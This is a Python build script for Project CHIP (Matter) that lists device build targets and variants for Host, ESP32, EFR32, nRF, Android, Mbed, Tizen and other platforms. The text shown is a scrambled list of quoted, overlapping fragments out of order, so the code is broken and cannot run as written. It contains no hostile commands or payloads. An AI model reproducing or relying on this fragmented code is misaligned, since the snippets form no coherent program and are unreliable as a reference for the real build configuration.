board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def", "app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT,", "target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield", "between build variants and globbing whitelist targets. \"\"\" for target", "class VariantBuilder: \"\"\"Handles creating multiple build variants based on a", "board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target =", "few are whitelisted for globs name = '-'.join([o.name for o", "from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App,", "List[Target] = []): # note the clone in case the", "builder = VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING))", "AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield", "targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT)", "for requirement in item.requires: if requirement not in available: return", "'-no-interactive' not in target.name: # Interactive builds will not compile", "**buildargs): self.name = name self.validator = validator self.conflicts = conflicts", "compliance with the License. # You may obtain a copy", "def TizenTargets(): # Possible build variants. # NOTE: The number", "# builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False),", "in a.conflicts): return True return False def AllRequirementsMet(items: List[BuildVariant]) ->", "\" clone.glob_blacklist_reason += reason else: clone.glob_blacklist_reason = reason return clone", "= self.glob_blacklist_reason return clone def Extend(self, suffix, **kargs): \"\"\"Creates a", "target = Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets():", "not in self.glob_whitelist: if not variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce", "self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\" Add another variant to accepted", "s in name: return True return False class BuildVariant: def", "and globbing whitelist targets. \"\"\" for target in self.targets: yield", "1): for subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue if", "enable_rpcs=True) if '-nrf5340dk-' in rpc.name: rpc = rpc.GlobBlacklist( 'Compile failure", "board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield", "to use and what arguments are required to produce the", "not use this file except in compliance with the License.", "board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target =", "AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield", "target = Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only", "for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters',", "import List from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder from builders.android", "a clone of self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason", "you may not use this file except in compliance with", "def MbedTargets(): target = Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W',", "target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS,", "Clone(self): \"\"\"Creates a clone of self.\"\"\" clone = Target(self.name, self.builder_class,", "\"\"\"Handles creating multiple build variants based on a starting target.", "\"\"\"Represents a build target: Has a name identifier plus parameters", "board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST))", "return clone def Extend(self, suffix, **kargs): \"\"\"Creates a clone of", "from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w import K32WApp,", "not in target.name: # Interactive builds will not compile by", "TizenBuilder from builders.bl602 import Bl602App, Bl602Board, Bl602Builder from builders.imx import", "app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import", "NrfConnectBuilder from builders.qpg import QpgApp, QpgBoard, QpgBuilder from builders.telink import", "return True class AcceptNameWithSubstrings: def __init__(self, substr: List[str]): self.substr =", "HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests',", "some builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app',", "whitelisted for globs name = '-'.join([o.name for o in subgroup])", "libreadline is not part of the default sysroot yield target.GlobBlacklist('Arm", "\"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields a list of acceptable", "or ('nl-test-runner' in target.name): # Single-variant builds yield target else:", "devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS)", "\"-\" as separator to the clone name **kargs: arguments needed", "requested') ] builder = VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend(", "app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True)", "target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller',", "are whitelisted for globs name = '-'.join([o.name for o in", "for target in builder.AllVariants(): if cross_compile and 'chip-tool' in target.name", "# Possible build variants. Note that number of potential #", "target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name): #", "MbedTargets(): target = Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W),", "items: for requirement in item.requires: if requirement not in available:", "app=TelinkApp.SWITCH)) # have a consistent order overall ALL.sort(key=lambda t: t.name)", "Esp32Builder from builders.host import HostApp, HostBoard, HostBuilder from builders.infineon import", "of potential # builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool',", "in case the default arg is used self.targets = targets[:]", "the clone in case the default arg is used self.targets", "Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants(): yield", "glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\" Add another variant", "app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN))", "Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield", "import QpgApp, QpgBoard, QpgBuilder from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder", "Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(),", "AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App,", "__init__(self, substr: List[str]): self.substr = substr def Accept(self, name: str):", "QorvoTargets(): target = Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield", "by default on arm cross compiles # because libreadline is", "buildargs self.requires = requires def HasConflicts(items: List[BuildVariant]) -> bool: for", "yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target", "app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w',", "target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield", "target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64,", "\"\"\" clone = self.Clone() clone.name += \"-\" + suffix clone.create_kw_args.update(kargs)", "import Esp32App, Esp32Board, Esp32Builder from builders.host import HostApp, HostBoard, HostBuilder", "ready to be created - no conflicts variant_target = target.Clone()", "= builder_class self.glob_blacklist_reason = None self.create_kw_args = kwargs def Clone(self):", "builders.bl602 import Bl602App, Bl602Board, Bl602Builder from builders.imx import IMXApp, IMXBuilder", "target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM,", "yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\") yield", "yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\")", "app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD,", "app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only',", "target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield", "target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = [] for target in targets:", "builder.target = self builder.identifier = self.name builder.output_dir = os.path.join(output_prefix, self.name)", "= Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target", "will not compile by default on arm cross compiles #", "' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for debugging purpose", "board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a',", "target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in", "usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields a", "variants and globbing whitelist targets. \"\"\" for target in self.targets:", "app=HostApp.NL_TEST_RUNNER)) for target in targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName()", "yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield", "clone name **kargs: arguments needed to produce the new build", "variant_target.Extend( option.name, **option.buildargs) # Only a few are whitelisted for", "AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield", "target ok_variants = [ v for v in self.variants if", "2021 Project CHIP Authors # # Licensed under the Apache", "app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() #", "yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT)", "yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver',", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc = target.Extend('light-rpc',", "= [] for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT))", "Bl602Targets(): target = Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def", "pw_build args not forwarded to proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield", "= esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)", "builders.host import HostApp, HostBoard, HostBuilder from builders.infineon import InfineonApp, InfineonBoard,", "app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL)", "yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool',", "\"\"\" Add another variant to accepted variants. Arguments are construction", "for generator in target_generators: for target in generator: ALL.append(target) #", "file except in compliance with the License. # You may", "InfineonTargets(): target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield", "yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump',", "K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\")", "target_generators: for target in generator: ALL.append(target) # Simple targets added", "default we do not want a 'build all' to select", "yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield", "board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP)", "[target_native] # x64 linux supports cross compile cross_compile = (HostBoard.NATIVE.PlatformName()", "return False def AllRequirementsMet(items: List[BuildVariant]) -> bool: \"\"\" Check that", "yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield", "number of potential # builds is exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings(", "from builders.android import AndroidApp, AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App,", "yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target = Target('mbed', MbedBuilder)", "app=NrfApp.LIGHT, enable_rpcs=True) if '-nrf5340dk-' in rpc.name: rpc = rpc.GlobBlacklist( 'Compile", "variants. Arguments are construction variants to BuildVariant. Example usage: builder.AppendVariant(name=\"ipv6only\",", "in b.conflicts) or (b.name in a.conflicts): return True return False", "TizenTargets(), Bl602Targets(), IMXTargets(), ] for generator in target_generators: for target", "# Simple targets added one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D,", "for this target ok_variants = [ v for v in", "in app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only", "language governing permissions and # limitations under the License. import", "yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light',", "reason return clone @property def IsGlobBlacklisted(self): return self.glob_blacklist_reason is not", "yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True)", "app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield", "K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ] for generator", "target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = [] target_generators = [ HostTargets(),", "if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = [] # Don't cross", "acceptable variants for the given targets. Handles conflict resolution between", "combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue if not AllRequirementsMet(subgroup): continue #", "app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT,", "app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light',", "KIND, either express or implied. # See the License for", "def Create(self, runner, repository_path: str, output_prefix: str, enable_flashbundle: bool): builder", "a list of acceptable variants for the given targets. Handles", "reason): clone = self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \"", "app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba',", "import MbedApp, MbedBoard, MbedBuilder, MbedProfile from builders.nrf import NrfApp, NrfBoard,", "builder = self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target = self builder.identifier", "return clone @property def IsGlobBlacklisted(self): return self.glob_blacklist_reason is not None", "suffix, **kargs): \"\"\"Creates a clone of the current object extending", "not support libreadline-dev') else: yield target # Without extra build", "board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a',", "name: str): return True class AcceptNameWithSubstrings: def __init__(self, substr: List[str]):", "use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only')", "(the \"License\"); # you may not use this file except", "- ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for debugging", "name): \"\"\" Whitelist the specified variant to be allowed for", "def __init__(self, targets: List[Target] = []): # note the clone", "app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand build\")", "build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield", "\"\"\" self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\" Add another variant to", "target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True)", "yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage',", "one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) #", "= Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets = [", "ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have", "builders.esp32 import Esp32App, Esp32Board, Esp32Builder from builders.host import HostApp, HostBoard,", "app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) #", "on how to build it (what builder class to use", "app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True)", "variant for variant_count in range(1, len(ok_variants) + 1): for subgroup", "variant to accepted variants. Arguments are construction variants to BuildVariant.", "Build every possible variant for variant_count in range(1, len(ok_variants) +", "# # Unless required by applicable law or agreed to", "['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants():", "that number of potential # builds is exponential here builder.AppendVariant(name=\"rpc\",", "targets added one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch',", "board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants. Note that", "Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board, Efr32Builder from builders.esp32 import", "target = Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool',", "validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False),", "not forwarded to proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def", "app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT,", "o in subgroup]) if name not in self.glob_whitelist: if not", "yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app',", "= Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone def", "By default we do not want a 'build all' to", "MbedProfile from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import", "variant_target = target.Clone() for option in subgroup: variant_target = variant_target.Extend(", "se05x=True).GlobBlacklist(\"Only on demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True)", "__init__(self, targets: List[Target] = []): # note the clone in", "= Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants():", "implied. # See the License for the specific language governing", "name **kargs: arguments needed to produce the new build variant", "requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user", "nrf52840dongle for all-clusters and lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE,", "user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only", "yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL)", "enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM)", "in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name):", "[ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(),", "app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def", "yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test',", "target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield", "produce the new build variant \"\"\" clone = self.Clone() clone.name", "self.requires = requires def HasConflicts(items: List[BuildVariant]) -> bool: for a,", "self.targets: yield target # skip variants that do not work", "with a \"-\" as separator to the clone name **kargs:", "user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only", "cross compile some builds app_targets.append( target_native.Extend('rpc-console', 